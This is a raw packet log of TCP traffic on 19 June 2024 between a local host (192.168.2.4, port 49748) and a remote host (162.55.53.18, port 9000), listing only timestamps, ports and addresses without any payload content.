Jun 19, 2024 14:40:15.829248905 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.829332113 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.829343081 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.829354048 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.829360008 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.829374075 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.829385042 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.829422951 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.829422951 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.829485893 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.829495907 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.829618931 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.829629898 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.829639912 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.829648018 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.829658985 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.829667091 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.829677105 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.829689026 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.829698086 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.829708099 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.829725981 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.829870939 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.829893112 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.829917908 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.829927921 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.829937935 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.829957008 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.830049992 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.919495106 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.919518948 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.919531107 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.919542074 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.919552088 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.919562101 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.919569969 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.919584990 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.919596910 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.919616938 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.919671059 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.920136929 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.920154095 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.920166016 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.920176983 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.920190096 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.920201063 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.920212030 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.920222998 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.920243025 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.920248985 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.920263052 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.920269012 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.920279980 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.920300961 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.920300961 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.920382977 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.920548916 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.920558929 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.920568943 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.920583010 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.920593977 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.920604944 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.920617104 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.920635939 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.920635939 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.920870066 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.920897961 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.920957088 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.920968056 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.920980930 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.921008110 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.921030045 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.921041012 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.921051979 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.921058893 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.921072006 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.921082020 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.921108007 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.921116114 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.921530008 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.011512995 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.011598110 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.011651039 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.011651039 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.011701107 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.011735916 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.011765957 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.011817932 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.011869907 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.011914968 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.011944056 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.011974096 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.012032032 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.012062073 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.012094021 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.012135983 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.012171984 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.012207985 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.012274981 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.012310982 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.012353897 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.012420893 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.012536049 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.012677908 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.012728930 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.012778997 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.012835026 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.012868881 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.012872934 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.012912035 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.012943983 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.012957096 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.012979031 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.012979031 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.013016939 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.013020039 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.013060093 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.013075113 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.013108969 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.013113022 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.013138056 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.013144016 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.013178110 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.013178110 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.013211966 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.013212919 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.013247013 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.013264894 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.013300896 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.013343096 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.013343096 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.013375998 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.013375998 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.013413906 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.013446093 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.013448954 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.013482094 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.013488054 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.013766050 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.103732109 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.103806973 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.103842974 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.103876114 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.103882074 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.103912115 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.103914022 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.103950024 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.103952885 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.103984118 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.103985071 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.104028940 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.104038954 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.104074001 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.104109049 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.104110956 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.104161978 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.104197025 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.104199886 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.104232073 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.104263067 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.104274035 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.104310989 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.104321957 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.104353905 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.104357004 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.104392052 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.104393959 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.104428053 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.104432106 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.104466915 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.104469061 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.104513884 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.104543924 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.104568958 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.104577065 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.104612112 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.104626894 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.104640961 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.104675055 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.104693890 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.104728937 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.104767084 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.104779959 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.104814053 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.104818106 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.104847908 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.104890108 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.104890108 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.104924917 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.104957104 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.104960918 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.104990959 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.105026007 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.105034113 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.105058908 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.105066061 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.105102062 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.105134964 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.105138063 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.105170965 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.105206966 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.105628014 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.194900990 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.194983006 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.195023060 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.195041895 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.195086956 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.195105076 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.195142031 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.195180893 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.195193052 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.195226908 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.195261955 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.195266008 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.195300102 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.195317030 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.195368052 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.195389032 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.195403099 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.195436954 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.195437908 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.195473909 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.195508003 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.195518017 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.195538998 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.195542097 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.195560932 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.195574999 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.195612907 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.195662022 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.195699930 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.195699930 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.195735931 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.195769072 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.195774078 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.195802927 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.195806980 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.195827961 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.195849895 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.195880890 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.195914030 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.195915937 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.195949078 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.195981979 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.195983887 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.196003914 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.196033001 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.196038961 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.196068048 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.196101904 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.196105003 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.196135998 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.196168900 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.196171045 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.196203947 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.196238041 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.196240902 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.196271896 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.196274042 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.196291924 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.196454048 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.236272097 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.236325979 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.236361980 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.236362934 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.236396074 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.236521959 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.285973072 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.286046028 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.286083937 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.286086082 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.286118984 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.286119938 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.286156893 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.286189079 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.286264896 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.286290884 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.286300898 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.286314011 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.286336899 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.286369085 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.286371946 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.286426067 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.286458015 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.286474943 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.286509991 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.286525011 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.286540985 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.286573887 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.286575079 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.286611080 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.286640882 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.286664009 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.286699057 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.286730051 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.286731958 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.286767960 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.286798954 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.286819935 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.286870956 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.286902905 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.286906958 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.286942005 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.286973953 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.286974907 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.287009954 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.287043095 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.287043095 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.287075043 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.287080050 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.287115097 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.287147045 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.287151098 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.287182093 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.287199974 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.287220001 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.287235022 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.287267923 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.287267923 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.287307024 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.287307024 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.287337065 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.287343979 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.287359953 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.287429094 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.327465057 CEST	9000	49748	162.55.53.18	192.168.2.4
